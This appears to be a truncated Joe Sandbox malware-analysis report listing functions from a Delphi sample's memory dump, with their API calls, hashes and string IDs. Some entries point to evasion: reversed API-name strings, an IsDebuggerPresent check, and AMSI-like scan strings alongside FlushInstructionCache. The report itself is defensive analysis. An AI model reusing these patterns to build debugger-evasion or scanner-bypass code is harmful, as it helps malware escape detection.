                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 351091851-0
                                                                                                                  • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                  • Instruction ID: a3cc6e153ce983e7b2c7c9f98c5c4049d16f7b45067a4cf59daf37eb1b059021
                                                                                                                  • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                  • Instruction Fuzzy Hash: F351F8759012299BCB26DB58CC84BD9B3BDAF49300F8045E5EA08E7211DB34EF858FA5
                                                                                                                  Function 02B13598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B135BA
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B13609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B135ED
                                                                                                                  • RegCloseKey.ADVAPI32(?,02B13610,00000000,?,00000004,00000000,02B13609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B13603
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                  • API String ID: 3677997916-4173385793
                                                                                                                  • Opcode ID: 7a4199660225e6d192260c5b2933bcfd77c09450245ddb29fc1b7a68b430ed62
                                                                                                                  • Instruction ID: 1c8feb75da51fdae4d5dbbc4daf5c7511bdc75fdfd5cd9d1bc68a892e1d899d5
                                                                                                                  • Opcode Fuzzy Hash: 7a4199660225e6d192260c5b2933bcfd77c09450245ddb29fc1b7a68b430ed62
                                                                                                                  • Instruction Fuzzy Hash: 1C01B575A54218BAEB11DF908D02BBD77ECDB08B00F9005E2BA04D7680F6B4A610CA59
                                                                                                                  Function 02B28274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: Kernel32$sserddAcorPteG
                                                                                                                  • API String ID: 667068680-1372893251
                                                                                                                  • Opcode ID: 56a3bccbbfef41f93ee2f5fb767c26ee062542e698b132604680a639d86f7116
                                                                                                                  • Instruction ID: fefa0f00f46704f3d8e6587eaa5a468e34159a77987ba8ebfc0d3ee2de320403
                                                                                                                  • Opcode Fuzzy Hash: 56a3bccbbfef41f93ee2f5fb767c26ee062542e698b132604680a639d86f7116
                                                                                                                  • Instruction Fuzzy Hash: 200162B5654304AFEB00EBA4DD41E9EB7FEEB48B10FA1C4E0F904D7604DA70A905DA28
                                                                                                                  Function 02B1AA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,02B1AAE7,?,?,00000000), ref: 02B1AA68
                                                                                                                    • Part of subcall function 02B1A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2
                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02B1AAE7,?,?,00000000), ref: 02B1AA98
                                                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02B1AAA3
                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02B1AAE7,?,?,00000000), ref: 02B1AAC1
                                                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02B1AACC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4102113445-0
                                                                                                                  • Opcode ID: c25de21866a3faed2c5c329f67eb67aaee1271a9e5c2862483b33f87f09f3b7c
                                                                                                                  • Instruction ID: 4600b78ba860fbead209e29b526e038162604ca901d989cbafc064485c8b12db
                                                                                                                  • Opcode Fuzzy Hash: c25de21866a3faed2c5c329f67eb67aaee1271a9e5c2862483b33f87f09f3b7c
                                                                                                                  • Instruction Fuzzy Hash: 5201F2B16116446FF612BA64CD11BAF776DDB81710FD101F0F510E66D8DA75AE00CA64
                                                                                                                  Function 02B1AB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,02B1ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02B1AB2F
                                                                                                                    • Part of subcall function 02B1A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Locale$InfoThread
                                                                                                                  • String ID: eeee$ggg$yyyy
                                                                                                                  • API String ID: 4232894706-1253427255
                                                                                                                  • Opcode ID: f45b332ebce2660b73673d088c6c997b01d70f6097ee09a4abaa24bf8f3c7acd
                                                                                                                  • Instruction ID: ee8bb3042f577d2e0c7255a6f09aca5ea51ad736c6efaadc0f55119a3c858ffe
                                                                                                                  • Opcode Fuzzy Hash: f45b332ebce2660b73673d088c6c997b01d70f6097ee09a4abaa24bf8f3c7acd
                                                                                                                  • Instruction Fuzzy Hash: F6419DB17055484BDB11EBB888906BFB3FBEF96300BE445E6D452C3394EB24F905CA65
                                                                                                                  Function 02B281CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  • GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc
                                                                                                                  • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                  • API String ID: 1883125708-1952140341
                                                                                                                  • Opcode ID: 779f5c99506f10f5272cd8195748eb5907a2bb9cf168b3c7e574ffa04f13ef2e
                                                                                                                  • Instruction ID: bf39e8ac72baaec92e9f5b566a9fd28435be79624ed916c4835548d209982002
                                                                                                                  • Opcode Fuzzy Hash: 779f5c99506f10f5272cd8195748eb5907a2bb9cf168b3c7e574ffa04f13ef2e
                                                                                                                  • Instruction Fuzzy Hash: C4F096B1A54704AFEB00EFB4DD01959F7FDE749740B9188E0F804D3620DA34AE149D35
                                                                                                                  Function 02B2F6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(KernelBase,?,02B2FAEB,UacInitialize,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,Initialize), ref: 02B2F6EE
                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B2F700
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                  • String ID: IsDebuggerPresent$KernelBase
                                                                                                                  • API String ID: 1646373207-2367923768
                                                                                                                  • Opcode ID: 6d0901c5a851615e28527e4beb28a8740ac354744e030dbbeda5711b60cfb90b
                                                                                                                  • Instruction ID: b5e4208da862008e53740efd043c4439ae8ff575a47f249ff175a983b3f320e3
                                                                                                                  • Opcode Fuzzy Hash: 6d0901c5a851615e28527e4beb28a8740ac354744e030dbbeda5711b60cfb90b
                                                                                                                  • Instruction Fuzzy Hash: 4AD012B17513601DBE0076F41CC482A239C875452D3300EE0B02AC64B2E5A6881D5114
                                                                                                                  Function 02B1C474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,02B3D10B,00000000,02B3D11E), ref: 02B1C47A
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02B1C48B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                  • API String ID: 1646373207-3712701948
                                                                                                                  • Opcode ID: 8b06ba101ac55f19801501316d27ae9d2d01183f77a5a4e16a036f98060aec71
                                                                                                                  • Instruction ID: ac9472e1a6448b30edc75d30d8db5b240ac2be4fefd152415510da4d9d44e1e9
                                                                                                                  • Opcode Fuzzy Hash: 8b06ba101ac55f19801501316d27ae9d2d01183f77a5a4e16a036f98060aec71
                                                                                                                  • Instruction Fuzzy Hash: 43D05EA0EC83445EF600AAB2548263A2B98CB08350B8848E7F40247104E773E4108F5A
                                                                                                                  Function 02B1E1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B1E297
                                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B1E2B3
                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B1E32A
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 02B1E353
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 920484758-0
                                                                                                                  • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                  • Instruction ID: 5b190c14df617428032a2f44cba9ca7e7b247a1af6a815ce07d1fd8903bd5442
                                                                                                                  • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                  • Instruction Fuzzy Hash: 2E410A75A012299FCB66DB58CC94BC9B3BDEF49314F4041D5E948A7211DA34EF808FA4
                                                                                                                  Function 02B1AD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B1AD59
                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B1AD7D
                                                                                                                  • GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B1AD98
                                                                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B1AE2E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3990497365-0
                                                                                                                  • Opcode ID: f80ba9a055bc628a19fcf184b2e3ad0d4bab5f63ce49c8e5afdb00894d60b3d9
                                                                                                                  • Instruction ID: 47c189bd0a31b12f63b9cbac55c2c94ece64e62810baaa38ae4933a5ca1c9080
                                                                                                                  • Opcode Fuzzy Hash: f80ba9a055bc628a19fcf184b2e3ad0d4bab5f63ce49c8e5afdb00894d60b3d9
                                                                                                                  • Instruction Fuzzy Hash: 9D414971A012589FDB21EB68CD84BDAB7FDAB08340F9400EAE548E7245DB74AF84CF50
                                                                                                                  Function 02B1AD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B1AD59
                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B1AD7D
                                                                                                                  • GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B1AD98
                                                                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B1AE2E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3990497365-0
                                                                                                                  • Opcode ID: 30d619722148db5de874bf34792b0a3791fdfec9b600061eca06d76ecc9eaef9
                                                                                                                  • Instruction ID: 0d3e5164f8552e9969a842f4c2fb6a988e779d8635d42459ea63c614692bfbff
                                                                                                                  • Opcode Fuzzy Hash: 30d619722148db5de874bf34792b0a3791fdfec9b600061eca06d76ecc9eaef9
                                                                                                                  • Instruction Fuzzy Hash: D7415A71A012589FDB21EB68CD84BDAB7FDAB08340F9400E6E548E7241DB74AF84CF50
                                                                                                                  Function 02B11C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: aaced1d7cb12c90a3f5fb177e5084d5a1e52c2b2e4256292f5dedc8702e22f98
                                                                                                                  • Instruction ID: 95a2c0ca5b1a6ae30791099c0ebec8e30aef967f8a9290670022a8f0b22fa17b
                                                                                                                  • Opcode Fuzzy Hash: aaced1d7cb12c90a3f5fb177e5084d5a1e52c2b2e4256292f5dedc8702e22f98
                                                                                                                  • Instruction Fuzzy Hash: 2CA1F9777306040BD718AA7C9D803BDB3D6DBC5265F9882BED31DCB385EB68C9528650
                                                                                                                  Function 02B194EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02B195DA), ref: 02B19572
                                                                                                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02B195DA), ref: 02B19578
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DateFormatLocaleThread
                                                                                                                  • String ID: yyyy
                                                                                                                  • API String ID: 3303714858-3145165042
                                                                                                                  • Opcode ID: 5cf10a9f76e784836047e293daf1c1a45dde89d4bd5289fd47833940f1f94b8f
                                                                                                                  • Instruction ID: 8676353fc7cd72329d1871b5d1e38ff6baba3b5ab980d0207943815eea3dd7c6
                                                                                                                  • Opcode Fuzzy Hash: 5cf10a9f76e784836047e293daf1c1a45dde89d4bd5289fd47833940f1f94b8f
                                                                                                                  • Instruction Fuzzy Hash: D2217C71A006989FDB10DFA8C891AAEB7B9EF09700F9104E5E905E7251DB30DE40CBA5
                                                                                                                  Function 02B28338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B283C2), ref: 02B283A4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                  • String ID: FlushInstructionCache$Kernel32
                                                                                                                  • API String ID: 3811539418-184458249
                                                                                                                  • Opcode ID: 784adca8a7e384750a369b37498409c999472911133d5b67b57caf007e2d1212
                                                                                                                  • Instruction ID: 616b8a28569c6041a2362061019d9ee7c4397ed36f089c6be7e56f977986e096
                                                                                                                  • Opcode Fuzzy Hash: 784adca8a7e384750a369b37498409c999472911133d5b67b57caf007e2d1212
                                                                                                                  • Instruction Fuzzy Hash: F2016DB1654304AFEB00EFA4DD41F5A77EDE708B40FA184A0F908D7650DA74AD159A29
                                                                                                                  Function 02B2AF24 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2AF58
